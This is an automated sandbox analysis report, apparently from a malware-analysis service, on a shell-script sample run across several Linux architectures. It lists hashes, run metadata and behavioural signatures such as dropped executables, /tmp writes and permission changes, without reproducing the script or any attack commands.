Analysis
-
max time kernel
81s -
max time network
83s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mips image:debian9-mipsbe-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
21/10/2024, 01:37
Static task
static1
Behavioral task
behavioral1
Sample
ace24a1256fc97981ff007772c03f80a114e30643e235c7c1e4bcc7c44b841a1.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
ace24a1256fc97981ff007772c03f80a114e30643e235c7c1e4bcc7c44b841a1.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
ace24a1256fc97981ff007772c03f80a114e30643e235c7c1e4bcc7c44b841a1.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
ace24a1256fc97981ff007772c03f80a114e30643e235c7c1e4bcc7c44b841a1.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
ace24a1256fc97981ff007772c03f80a114e30643e235c7c1e4bcc7c44b841a1.sh
-
Size
10KB
-
MD5
d02d2cc45f453ae469915bf5bfcf48ec
-
SHA1
5db9569732492cb7f0762973db3950e0cbbff9d8
-
SHA256
ace24a1256fc97981ff007772c03f80a114e30643e235c7c1e4bcc7c44b841a1
-
SHA512
e6f62639d7a9ed67f76e803004282c82162e299db70a632e144b81ac07192254c5e424f5bc32b5267f608d7b11c7692c55098a8f3d0dd4fe69efa61d22430f3b
-
SSDEEP
96:rb5p07Lo4jxniybeVFX5Xe4WVykrlkz9Cb5O:rb5y7Lo4jp+Fwb5O
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97